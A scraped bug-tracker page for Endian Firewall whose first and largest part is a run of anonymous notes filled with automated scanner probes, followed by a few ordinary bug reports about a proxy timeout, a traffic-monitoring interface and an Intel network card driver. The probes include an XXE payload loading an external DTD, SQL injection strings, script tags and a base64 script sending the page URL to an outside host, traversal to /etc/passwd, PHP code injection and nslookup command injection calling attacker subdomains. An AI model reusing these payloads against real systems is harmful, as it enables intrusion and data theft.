<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://8b_dpll6"><!ENTITY [^] % d "3ojdeh6kxq4b_tlqv71fqborj47naj5wznu.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> [^] %dtd;]><r>&a;</r>
(0008915)
Anonymous   
2017-05-16 21:15   
'+NSFTW+'
(0008916)
Anonymous   
2017-05-16 21:15   
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
(0008917)
Anonymous   
2017-05-16 21:15   
3
(0008918)
Anonymous   
2017-05-16 21:16   
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
(0008919)
Anonymous   
2017-05-16 21:16   
3
(0008920)
Anonymous   
2017-05-16 21:32   
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
(0008921)
Anonymous   
2017-05-16 21:32   
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
(0008922)
Anonymous   
2017-05-16 21:32   
3
(0008923)
Anonymous   
2017-05-16 21:32   
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
(0008924)
Anonymous   
2017-05-16 21:33   
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
(0008925)
Anonymous   
2017-05-16 21:33   
3
(0008926)
Anonymous   
2017-05-16 21:33   
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
(0008927)
Anonymous   
2017-05-16 21:33   
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
(0008928)
Anonymous   
2017-05-16 21:33   
3
(0008929)
Anonymous   
2017-05-16 21:34   
3
(0008930)
Anonymous   
2017-05-16 21:34   
3
(0008931)
Anonymous   
2017-05-16 21:35   
3
(0008932)
Anonymous   
2017-05-16 21:35   
3
(0008933)
Anonymous   
2017-05-16 21:35   
3
(0008934)
Anonymous   
2017-05-16 21:35   
3
(0008935)
Anonymous   
2017-05-16 21:36   
3
(0008936)
Anonymous   
2017-05-16 21:36   
3
(0008937)
Anonymous   
2017-05-16 21:36   
http://8b_dpll63oap5vafznk-v3otzwug1vtcbrmwj3gygoj.r87.me/p/ [^]
(0008938)
Anonymous   
2017-05-16 21:36   
3
(0008939)
Anonymous   
2017-05-16 21:36   
http://8b_dpll63okt0ppuqexjzmtxsefmetxof3ekssgx-77.r87.me/p/ [^]
(0008940)
Anonymous   
2017-05-16 21:37   
php://filter//resource=http://8b_dpll63o421ujeb2zl4zhnmosnw8mzl-ndvmb_ctl.r87.me/p/ [^]
(0008941)
Anonymous   
2017-05-16 21:37   
3
(0008942)
Anonymous   
2017-05-16 21:37   
php://filter//resource=http://8b_dpll63o9h-vcn4alofl8b80pcn0ude0i5b16pj9x.r87.me/p/ [^]
(0008943)
Anonymous   
2017-05-16 21:38   
8b_dpll63olqyx7hwg15s1tta9tm8bd8wnt6hkpcmfp.r87.me/p/
(0008944)
Anonymous   
2017-05-16 21:38   
3
(0008945)
Anonymous   
2017-05-16 21:38   
8b_dpll63oqtgokengbgmw-zddfmnhh9tiqkaovxu_z.r87.me/p/
(0008946)
Anonymous   
2017-05-16 21:38   
3
(0008947)
Anonymous   
2017-05-16 21:38   
3
(0008948)
Anonymous   
2017-05-16 21:38   
3
(0008949)
Anonymous   
2017-05-16 21:39   
3
(0008950)
Anonymous   
2017-05-16 21:39   
3
(0008951)
Anonymous   
2017-05-16 21:39   
3
(0008952)
Anonymous   
2017-05-16 21:39   
3
(0008953)
Anonymous   
2017-05-16 21:39   
'"--></style></scRipt><scRipt src="//8b_dpll63o2yvjialxjzxvt7gzwlg6zoka_ckdvu7me.r87.me"></scRipt>
(0008954)
Anonymous   
2017-05-16 21:39   
3
(0008955)
Anonymous   
2017-05-16 21:40   
'"--></style></scRipt><scRipt src="//8b_dpll63oxu7jhdbgzpkewrew6bai2oshl5bzzzg_m.r87.me"></scRipt>
(0008956)
Anonymous   
2017-05-16 21:40   
<iMg src="//8b_dpll63ogfw3hfbk3krht41j3pmxpojbnpyx4gwgc.r87.me"/>
(0008957)
Anonymous   
2017-05-16 21:40   
3
(0008958)
Anonymous   
2017-05-16 21:40   
<iMg src="//8b_dpll63od_lr8zx7pk7t6bs6o_x5ix1srbgvp0q48.r87.me"/>
(0008959)
Anonymous   
2017-05-16 21:41   
<fRame src="//8b_dpll63olptwjbcgrl2lc3jc-tigtajgzcxqxysty.r87.me"></fRame>
(0008960)
Anonymous   
2017-05-16 21:42   
<scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vOGJfZHBsbDYzb2J6d2NnY3UyazloaXFpZDFfdXBrbDl4Znd6OW8xOCIrInUzaS5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>
(0008961)
Anonymous   
2017-05-16 21:42   
3
(0008962)
Anonymous   
2017-05-16 21:42   
3
(0008963)
Anonymous   
2017-05-16 21:42   
<scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vOGJfZHBsbDYzb213ZjVlYmF0d3ptbjJ1bGpfNXJuaXB0bmdvZGxxayIrImxtby5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>
(0008964)
Anonymous   
2017-05-16 21:42   
3
(0008965)
Anonymous   
2017-05-16 21:43   
";l=document.createElement("link");l.rel="prefetch";l.href="//8b_dpll63o1zuztk-m0sibbnd3irmvut8ado7mry"+"axg.r87.me/r/?"+location.href;document.head.appendChild(l);//
(0008966)
Anonymous   
2017-05-16 21:43   
3
(0008967)
Anonymous   
2017-05-16 21:43   
';l=document.createElement("link");l.rel="prefetch";l.href="//8b_dpll63op1drixkmouv6cl_5ndt7hnkrde_uzi"+"dtu.r87.me/r/?"+location.href;document.head.appendChild(l);//
(0008968)
Anonymous   
2017-05-16 21:43   
3
(0008969)
Anonymous   
2017-05-16 21:43   
';l=document.createElement("link");l.rel="prefetch";l.href="//8b_dpll63orshm1cvxc8oriwf6m6r4fovx8lwmo0"+"zyg.r87.me/r/?"+location.href;document.head.appendChild(l);//
(0008970)
Anonymous   
2017-05-16 21:43   
3
(0008971)
Anonymous   
2017-05-16 21:44   
3
(0008972)
Anonymous   
2017-05-16 21:44   
3
(0008973)
Anonymous   
2017-05-16 21:44   
3
(0008974)
Anonymous   
2017-05-16 21:44   
3
(0008975)
Anonymous   
2017-05-16 21:45   
3
(0008976)
Anonymous   
2017-05-16 21:45   
3
(0008977)
Anonymous   
2017-05-16 21:45   
3
(0008978)
Anonymous   
2017-05-16 21:45   
3
(0008979)
Anonymous   
2017-05-16 21:45   
3
(0008980)
Anonymous   
2017-05-16 21:45   
3
(0008981)
Anonymous   
2017-05-16 21:46   
3
(0008982)
Anonymous   
2017-05-16 21:46   
3
(0008983)
Anonymous   
2017-05-16 21:46   
3
(0008984)
Anonymous   
2017-05-16 21:47   
3
(0008985)
Anonymous   
2017-05-16 21:47   
3
(0008986)
Anonymous   
2017-05-16 21:47   
3
(0008987)
Anonymous   
2017-05-16 21:48   
3
(0008988)
Anonymous   
2017-05-16 21:48   
http://r87.com/?bugs.endian.com/ [^]
(0008989)
Anonymous   
2017-05-16 21:48   
/../../../../../../../../../../proc/self/fd/2
(0008990)
Anonymous   
2017-05-16 21:48   
http://r87.com/?bugs.endian.com/ [^]
(0008991)
Anonymous   
2017-05-16 21:49   
http://r87.com/?bugs.endian.com/ [^]
(0008992)
Anonymous   
2017-05-16 21:49   
/../../../../../../../../../../proc/self/fd/2.php
(0008993)
Anonymous   
2017-05-16 21:49   
http://r87.com/?bugs.endian.com/ [^]
(0008994)
Anonymous   
2017-05-16 21:49   
/../../../../../../../../../../etc/httpd/logs/error.log
(0008995)
Anonymous   
2017-05-16 21:49   
//r87.com/?http://bugs.endian.com/ [^]
(0008996)
Anonymous   
2017-05-16 21:49   
/../../../../../../../../../../etc/httpd/logs/error.log
(0008997)
Anonymous   
2017-05-16 21:49   
//r87.com/?http://bugs.endian.com/ [^]
(0008998)
Anonymous   
2017-05-16 21:49   
/../../../../../../../../../../etc/httpd/logs/error_log
(0008999)
Anonymous   
2017-05-16 21:49   
r87.com/?bugs.endian.com/
(0009000)
Anonymous   
2017-05-16 21:49   
/../../../../../../../../../../etc/httpd/logs/error_log
(0009001)
Anonymous   
2017-05-16 21:50   
r87.com/?bugs.endian.com/
(0009002)
Anonymous   
2017-05-16 21:50   
3
(0009003)
Anonymous   
2017-05-16 21:50   
/../../../../../../../../../../var/log/apache2/error.log
(0009004)
Anonymous   
2017-05-16 21:50   
r87.com/?http://bugs.endian.com/ [^]
(0009005)
Anonymous   
2017-05-16 21:50   
/../../../../../../../../../../var/log/apache2/error.log
(0009006)
Anonymous   
2017-05-16 21:51   
r87.com/?http://bugs.endian.com/ [^]
(0009007)
Anonymous   
2017-05-16 21:51   
3
(0009008)
Anonymous   
2017-05-16 21:51   
/../../../../../../../../../../var/log/apache/error.log
(0009009)
Anonymous   
2017-05-16 21:51   
r87.com/?https://bugs.endian.com/ [^]
(0009010)
Anonymous   
2017-05-16 21:51   
/../../../../../../../../../../var/log/apache/error.log
(0009011)
Anonymous   
2017-05-16 21:52   
3
(0009012)
Anonymous   
2017-05-16 21:52   
3
(0009013)
Anonymous   
2017-05-16 21:52   
3
(0009014)
Anonymous   
2017-05-16 21:52   
r87.com/?https://bugs.endian.com/ [^]
(0009015)
Anonymous   
2017-05-16 21:52   
/../../../../../../../../../../proc/version
(0009016)
Anonymous   
2017-05-16 21:52   
3
(0009017)
Anonymous   
2017-05-16 21:52   
3
(0009018)
Anonymous   
2017-05-16 21:52   
3
(0009019)
Anonymous   
2017-05-16 21:52   
3
(0009020)
Anonymous   
2017-05-16 21:52   
/\r87.com/?bugs.endian.com/
(0009021)
Anonymous   
2017-05-16 21:52   
3
(0009022)
Anonymous   
2017-05-16 21:52   
/../../../../../../../../../../proc/version
(0009023)
Anonymous   
2017-05-16 21:53   
3
(0009024)
Anonymous   
2017-05-16 21:53   
/\r87.com/?bugs.endian.com/
(0009025)
Anonymous   
2017-05-16 21:53   
/../../../../../../../../../../proc/version.php
(0009026)
Anonymous   
2017-05-16 21:53   
3
(0009027)
Anonymous   
2017-05-16 21:54   
///r87.com/?bugs.endian.com/
(0009028)
Anonymous   
2017-05-16 21:54   
/../../../../../../../../../../proc/version.php
(0009029)
Anonymous   
2017-05-16 21:54   
3
(0009030)
Anonymous   
2017-05-16 21:54   
///r87.com/?bugs.endian.com/
(0009031)
Anonymous   
2017-05-16 21:54   
/../../../../../../../../../../../etc/passwd
(0009032)
Anonymous   
2017-05-16 21:54   
3
(0009033)
Anonymous   
2017-05-16 21:55   
<iframe src="http://r87.com/?"></iframe> [^]
(0009034)
Anonymous   
2017-05-16 21:55   
file:///etc/passwd [^]
(0009035)
Anonymous   
2017-05-16 21:55   
3
(0009036)
Anonymous   
2017-05-16 21:56   
<iframe src="http://r87.com/?"></iframe> [^]
(0009037)
Anonymous   
2017-05-16 21:56   
file:///etc/passwd [^]
(0009038)
Anonymous   
2017-05-16 21:56   
3
(0009039)
Anonymous   
2017-05-16 21:56   
bugs.endian.com.r87.com/?
(0009040)
Anonymous   
2017-05-16 21:57   
/../../../../../../../../../../../etc/passwd
(0009041)
Anonymous   
2017-05-16 21:57   
3
(0009042)
Anonymous   
2017-05-16 21:57   
bugs.endian.com.r87.com/?
(0009043)
Anonymous   
2017-05-16 21:57   
/../../../../../../../../../../../etc/passwd
(0009044)
Anonymous   
2017-05-16 21:57   
3
(0009045)
Anonymous   
2017-05-16 21:58   
http://bugs.endian.com.r87.com/? [^]
(0009046)
Anonymous   
2017-05-16 21:58   
/../../../../../../../../../../../etc/passwd.php
(0009047)
Anonymous   
2017-05-16 21:58   
3
(0009048)
Anonymous   
2017-05-16 21:58   
http://bugs.endian.com.r87.com/? [^]
(0009049)
Anonymous   
2017-05-16 21:59   
3
(0009050)
Anonymous   
2017-05-16 21:59   
/../../../../../../../../../../../etc/passwd.php
(0009051)
Anonymous   
2017-05-16 21:59   
https://bugs.endian.com.r87.com/? [^]
(0009052)
Anonymous   
2017-05-16 22:00   
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
(0009053)
Anonymous   
2017-05-16 22:00   
3
(0009054)
Anonymous   
2017-05-16 22:00   
3
(0009055)
Anonymous   
2017-05-16 22:00   
/../../../../../../../../../../../etc/passwd
(0009056)
Anonymous   
2017-05-16 22:01   
3
(0009057)
Anonymous   
2017-05-16 22:01   
/../../../../../../../../../../../etc/passwd
(0009058)
Anonymous   
2017-05-16 22:01   
3
(0009059)
Anonymous   
2017-05-16 22:02   
/etc/passwd
(0009060)
Anonymous   
2017-05-16 22:02   
3
(0009061)
Anonymous   
2017-05-16 22:02   
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
(0009062)
Anonymous   
2017-05-16 22:02   
3
(0009063)
Anonymous   
2017-05-16 22:03   
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
(0009064)
Anonymous   
2017-05-16 22:03   
data:;base64,TlM3NzU0NTYxNDQ2NTc1
(0009065)
Anonymous   
2017-05-16 22:04   
3
(0009066)
Anonymous   
2017-05-16 22:04   
3
(0009067)
Anonymous   
2017-05-16 22:04   
data:;base64,TlM3NzU0NTYxNDQ2NTc1
(0009068)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63otcgp-y6dqynqnervrovktzjzynwaeq'.'xri.r87.me'))
(0009069)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63ochkzzu9cfm8_bcig7vxuuqsrym2qwg'.'kx8.r87.me'))
(0009070)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63ouonltlzem2rd8iedqvh7-arui4yhti'.'2tq.r87.me'));
(0009071)
Anonymous   
2017-05-16 22:04   
gethostbyname(trim('8b_dpll63osymwsmdhnln907u3m7ueza728nrupx'.'lbw.r87.me'));
(0009072)
Anonymous   
2017-05-16 22:04   
+gethostbyname(trim('8b_dpll63ooacuumnubqrb0a65uejw1hjxvxkg3g'.'t70.r87.me'));//
(0009073)
Anonymous   
2017-05-16 22:04   
+gethostbyname(trim('8b_dpll63o49kgeogdg5jislakjblhrd0_51z6xz'.'9io.r87.me'));//
(0009074)
Anonymous   
2017-05-16 22:04   
bug_update.php
(0009075)
Anonymous   
2017-05-16 22:04   
'+gethostbyname(trim('8b_dpll63opep4djzed3o6ljr93wax4wtjh-ibxh'.'hoa.r87.me'))+'
(0009076)
Anonymous   
2017-05-16 22:05   
'+gethostbyname(trim('8b_dpll63or8a-4bw2gespg-gra4vr4lmp_gfacn'.'mwg.r87.me'))+'
(0009077)
Anonymous   
2017-05-16 22:05   
"+gethostbyname(trim('8b_dpll63o6fd98rnyscfsyssvjwm4ksnt3hyedu'.'tci.r87.me'))+"
(0009078)
Anonymous   
2017-05-16 22:05   
"+gethostbyname(trim('8b_dpll63o2zij7m8vctodgvlwiqotvctrccux6a'.'dra.r87.me'))+"
(0009079)
Anonymous   
2017-05-16 22:05   
<? gethostbyname(trim('8b_dpll63ohc62hck5jyroogdlkzfwoh3ptl9jze'.'1j0.r87.me'));//?>
(0009080)
Anonymous   
2017-05-16 22:05   
<? gethostbyname(trim('8b_dpll63oqjkco-gsrki1djghz1zg-ulvcyvbo-'.'hym.r87.me'));//?>
(0009081)
Anonymous   
2017-05-16 22:05   
'{${gethostbyname(trim('8b_dpll63o8nvknodtol14mnb7rlqeplrb_zcn1b'.'yp8.r87.me'))}}'
(0009082)
Anonymous   
2017-05-16 22:05   
'{${gethostbyname(trim('8b_dpll63o_ru1v0hwcyjhysekbcretpx6dco4g2'.'fke.r87.me'))}}'
(0009083)
Anonymous   
2017-05-16 22:05   
3
(0009084)
Anonymous   
2017-05-16 22:05   
bug_update.php
(0009085)
Anonymous   
2017-05-16 22:05   
nslookup 8b_dpll63ojeksqnorc_oazpvo_14hfjkbgb2-qohja.r87.me&'\"`0&nslookup 8b_dpll63ojeksqnorc_oazpvo_14hfjkbgb2-qohja.r87.me&`'
(0009086)
Anonymous   
2017-05-16 22:06   
bug_update.php
(0009087)
Anonymous   
2017-05-16 22:06   
nslookup 8b_dpll63ooi8vli1gn7w2nu4ghzoaozyiubqm8h_ic.r87.me&'\"`0&nslookup 8b_dpll63ooi8vli1gn7w2nu4ghzoaozyiubqm8h_ic.r87.me&`'
(0009088)
Anonymous   
2017-05-16 22:06   
bug_update.php
(0009089)
Anonymous   
2017-05-16 22:06   
3
(0009090)
Anonymous   
2017-05-16 22:06   
& nslookup 8b_dpll63o_tnkjdnmmr47gac8oj5gsbzpw-xviot3m.r87.me&'\"`0&nslookup 8b_dpll63o_tnkjdnmmr47gac8oj5gsbzpw-xviot3m.r87.me&`'
(0009091)
Anonymous   
2017-05-16 22:07   
& nslookup 8b_dpll63obedgv1-ttj4sgtvdgis1kfkect2aewlue.r87.me&'\"`0&nslookup 8b_dpll63obedgv1-ttj4sgtvdgis1kfkect2aewlue.r87.me&`'
(0009092)
Anonymous   
2017-05-16 22:07   
3
(0009093)
Anonymous   
2017-05-16 22:07   
'& nslookup 8b_dpll63okdb1cdhnbdlrsohtmukjlyy51ny198a3m.r87.me&'\"`0&nslookup 8b_dpll63okdb1cdhnbdlrsohtmukjlyy51ny198a3m.r87.me&`'
(0009094)
Anonymous   
2017-05-16 22:08   
'& nslookup 8b_dpll63ovneaw-m2i_edcfq0mdlijxbqvoaaij6o4.r87.me&'\"`0&nslookup 8b_dpll63ovneaw-m2i_edcfq0mdlijxbqvoaaij6o4.r87.me&`'
(0009095)
Anonymous   
2017-05-16 22:08   
"& nslookup 8b_dpll63oi6q4ofbyddmmtss0nv7tuwkphrrhnmq4w.r87.me&'\"`0&nslookup 8b_dpll63oi6q4ofbyddmmtss0nv7tuwkphrrhnmq4w.r87.me&`'
(0009096)
Anonymous   
2017-05-16 22:08   
3
(0009097)
Anonymous   
2017-05-16 22:09   
"& nslookup 8b_dpll63ota3bqapbvc2m3zz-aysmcob8bwraku7aq.r87.me&'\"`0&nslookup 8b_dpll63ota3bqapbvc2m3zz-aysmcob8bwraku7aq.r87.me&`'
(0009098)
Anonymous   
2017-05-16 22:09   
nslookup "8b_dpll63okhnedivjy4m41zgztyfqfhb4puiemi""qlg.r87.me"
(0009099)
Anonymous   
2017-05-16 22:09   
3
(0009100)
Anonymous   
2017-05-16 22:10   
nslookup "8b_dpll63oyicukspqrdibjxlxvax7hmkhd12_cj""b5i.r87.me"
(0009101)
Anonymous   
2017-05-16 22:10   
&nslookup "8b_dpll63olmt9ymebb7plj-sz1asystjqrz4cww""kvi.r87.me"
(0009102)
Anonymous   
2017-05-16 22:10   
3
(0009103)
Anonymous   
2017-05-16 22:10   
&nslookup "8b_dpll63ojloyx5jdgjasdm8x3fybvqpjdygznk""9yo.r87.me"
(0009104)
Anonymous   
2017-05-16 22:11   
'&nslookup "8b_dpll63o4axenw_jidyhcporqykodccszaabru""oec.r87.me"
(0009105)
Anonymous   
2017-05-16 22:11   
3
(0009106)
Anonymous   
2017-05-16 22:11   
'&nslookup "8b_dpll63olj9mq23aorjnvygkzlzptxeqeahosu""2sw.r87.me"
(0009107)
Anonymous   
2017-05-16 22:12   
"&nslookup "8b_dpll63ovd3pmzcoahjsblmll-wj9l7fph4xni""_ys.r87.me"
(0009108)
Anonymous   
2017-05-16 22:12   
3
(0009109)
Anonymous   
2017-05-16 22:12   
"&nslookup "8b_dpll63oople7aqutkogv9ejwby9tcbzqjbjsv""x-w.r87.me"
(0009110)
Anonymous   
2017-05-16 22:13   
|nslookup${IFS}"8b_dpll63oifsxv8m5zrxtxannvb9mdmgeh8wgvk""yrs.r87.me"
(0009111)
Anonymous   
2017-05-16 22:13   
3
(0009112)
Anonymous   
2017-05-16 22:13   
|nslookup${IFS}"8b_dpll63owrreeei0vj04uqh8ptar_dmu8lj7ne""668.r87.me"
(0009113)
Anonymous   
2017-05-16 22:14   
3
(0009114)
Anonymous   
2017-05-16 22:15   
3
(0009115)
Anonymous   
2017-05-16 22:15   
3
(0009116)
Anonymous   
2017-05-16 22:16   
'"--></style></scRipt><scRipt>netsparker(0x007652)</scRipt>
(0009117)
Anonymous   
2017-05-16 22:16   
'"--></style></scRipt><scRipt>netsparker(0x007653)</scRipt>
(0009118)
Anonymous   
2017-05-16 22:16   
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x007656%29%3C%2FscRipt%3E
(0009119)
Anonymous   
2017-05-16 22:16   
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x007657%29%3C%2FscRipt%3E
(0009120)
Anonymous   
2017-05-16 22:17   
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA3NjU4KTwvc2NyaXB0Pg==
(0009121)
Anonymous   
2017-05-16 22:17   
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA3NjU5KTwvc2NyaXB0Pg==
(0009122)
Anonymous   
2017-05-16 22:17   
'" ns=netsparker(0x00765A)
(0009123)
Anonymous   
2017-05-16 22:18   
'" ns=netsparker(0x00765B)
(0009124)
Anonymous   
2017-05-16 22:18   
1 ns=netsparker(0x00765C)
(0009125)
Anonymous   
2017-05-16 22:18   
1 ns=netsparker(0x00765D)
(0009126)
Anonymous   
2017-05-16 22:19   
//r87.com/n/n.css?0x007666
(0009127)
Anonymous   
2017-05-16 22:19   
//r87.com/n/n.css?0x007667
(0009128)
Anonymous   
2017-05-16 22:19   
//r87.com/n/j/?0x007668
(0009129)
Anonymous   
2017-05-16 22:20   
//r87.com/n/j/?0x007669
(0009130)
Anonymous   
2017-05-16 22:20   
'><net sparker=netsparker(0x00766A)>
(0009131)
Anonymous   
2017-05-16 22:20   
'><net sparker=netsparker(0x00766B)>
(0009132)
Anonymous   
2017-05-16 22:21   
"><net sparker=netsparker(0x00766C)>
(0009133)
Anonymous   
2017-05-16 22:21   
"><net sparker=netsparker(0x00766D)>
(0009134)
Anonymous   
2017-05-16 22:21   
<iMg src=N onerror=netsparker(0x00766E)>
(0009135)
Anonymous   
2017-05-16 22:22   
<iMg src=N onerror=netsparker(0x00766F)>
(0009136)
Anonymous   
2017-05-16 22:22   
javascript:netsparker(0x007670)
(0009137)
Anonymous   
2017-05-16 22:22   
javascript:netsparker(0x007671)
(0009138)
Anonymous   
2017-05-16 22:23   
<scRipt>ns(0x007672)</scRipt>
(0009139)
Anonymous   
2017-05-16 22:23   
<scRipt>ns(0x007673)</scRipt>
(0009140)
Anonymous   
2017-05-16 22:24   
n;ns:expression(netsparker(0x007674));
(0009141)
Anonymous   
2017-05-16 22:24   
n;ns:expression(netsparker(0x007675));
(0009142)
Anonymous   
2017-05-16 22:24   
body{x:expression(netsparker(0x007676))}
(0009143)
Anonymous   
2017-05-16 22:25   
body{x:expression(netsparker(0x007677))}
(0009144)
Anonymous   
2017-05-16 22:25   
*/netsparker(0x007678);/*
(0009145)
Anonymous   
2017-05-16 22:25   
*/netsparker(0x007679);/*
(0009146)
Anonymous   
2017-05-16 22:26   
'+netsparker(0x00767A)+'
(0009147)
Anonymous   
2017-05-16 22:26   
'+netsparker(0x00767B)+'
(0009148)
Anonymous   
2017-05-16 22:27   
"+netsparker(0x00767C)+"
(0009149)
Anonymous   
2017-05-16 22:27   
"+netsparker(0x00767D)+"
(0009150)
Anonymous   
2017-05-16 22:27   
\';netsparker(0x00767E);///
(0009151)
Anonymous   
2017-05-16 22:28   
\';netsparker(0x00767F);///
(0009152)
Anonymous   
2017-05-16 22:28   
',netsparker(0x007680),'
(0009153)
Anonymous   
2017-05-16 22:28   
',netsparker(0x007681),'
(0009154)
Anonymous   
2017-05-16 22:29   
 netsparker(0x007682)
(0009155)
Anonymous   
2017-05-16 22:29   
 netsparker(0x007683)
(0009156)
Anonymous   
2017-05-16 22:30   

netsparker(0x007684);
(0009157)
Anonymous   
2017-05-16 22:30   

netsparker(0x007685);
(0009158)
Anonymous   
2017-05-16 22:30   
'+netsparker(0x007686)+'
(0009159)
Anonymous   
2017-05-16 22:31   
'+netsparker(0x007687)+'
(0009160)
Anonymous   
2017-05-16 22:31   
'"@--></style></scRipt><scRipt>netsparker(0x007688)</scRipt>
(0009161)
Anonymous   
2017-05-16 22:32   
'"@--></style></scRipt><scRipt>netsparker(0x007689)</scRipt>
(0009162)
Anonymous   
2017-05-16 22:32   
[ns](javascript:netsparker(0x00768A);)
(0009163)
Anonymous   
2017-05-16 22:32   
[ns](javascript:netsparker(0x00768B);)
(0009164)
Anonymous   
2017-05-16 22:33   
//r87.com/?0x0076B0
(0009165)
Anonymous   
2017-05-16 22:33   
//r87.com/?0x0076B1
(0009166)
Anonymous   
2017-05-16 22:34   
3
(0009167)
Anonymous   
2017-05-16 22:34   
3
(0009168)
Anonymous   
2017-05-16 22:35   
3





View Issue Details
3483 [Endian Firewall] Proxy HTTP major always 2011-02-15 20:27 2014-07-28 18:10
am89  
lorenzo-endian  
normal  
feedback 2.4.1  
reopened  
none    
none  
   
Http proxy error 110 connection timed out
Hi! i've configured endian as a firewall and transparent proxy and all seemed to work well since some days ago, now when i try to connect to mail.alice.it an Italian provider i can't because the proxy gives me this message: (110) error connection timed out, but if i turn off the proxy it works, i have cleaned the cache and also turned off and then on the proxy, also restarted endian but with the proxy on the page doesn't work...why?
Notes
(0005724)
lorenzo-endian   
2011-02-17 14:23   
hi am89,

you are right. The problem is that alice.it is in the blacklists we are using. I hope we are able to solve the problem as soon as possible.

Thanks again

Lo
(0005738)
lorenzo-endian   
2011-02-22 10:56   
hi am89,

can you check if the problem is still there? now the blacklists seems to be ok

Let me know the results of your tests and thanks in advance

Lo
(0005740)
am89   
2011-02-22 12:39   
Now it works! thanks for all!
(0005741)
lorenzo-endian   
2011-02-22 13:17   
Hi am89,

no problem, you are always welcome!

Have a nice day and happy hacking!

Lo
(0008554)
Anonymous   
2014-07-28 18:10   
igual
http://mail.steripharma.com.ve/ [^]





View Issue Details
1126 [Endian Firewall] Other Services major have not tried 2008-07-14 13:13 2014-01-08 06:52
simon-endian  
chris-endian  
normal  
resolved  
fixed  
none    
none  
  future  
Traffic Monitoring Administration interface does not work
 problem in Services --> Traffic Monitoring : Administration
interface does not work... I need to disable then enable traffic
monitoring for accessing to the web console... but many hours of
data is not collected...
Notes
(0004974)
Anonymous   
2010-10-25 09:24   
(edited on: 2010-10-25 09:26)
I also got this error - but with the current version (with a fresh installed v2.4 and smart update/upgrade). Sometimes the Webpage works but only for a short period of time.

(0007955)
mhLearn   
2012-07-23 02:37   
My case is worst. WebGUI in blank only





View Issue Details
4394 [Endian Firewall] Hardware related (kernel, drivers, hardware) tweak always 2012-07-18 14:45 2013-11-26 15:39
EDV-Team  
luca-endian  
normal  
resolved 2.5  
fixed  
none    
none future  
   
Support for Intel 82580 based network cards (Ethernet-Server-Adapter I340-T4)
The Intel Ethernet-Server-Adapter I340-T4 and other Intel 82580 based network cards don't work on Endian 2.5.1.
There is a Linux driver on the Intel website:
http://downloadcenter.intel.com/detail_desc.aspx?agr=Y&DwnldID=13663 [^]

Please add this driver to EFW Community Edition or provide a Kernel source package so that users can compile the driver itself.

Thank you very much!
Notes
(0008011)
svenasse   
2012-08-16 15:42   
I'm using the commercial version of Endian 2.5 and am having issues with the Intel 82580 support. This was not an issue with Endian 2.4.

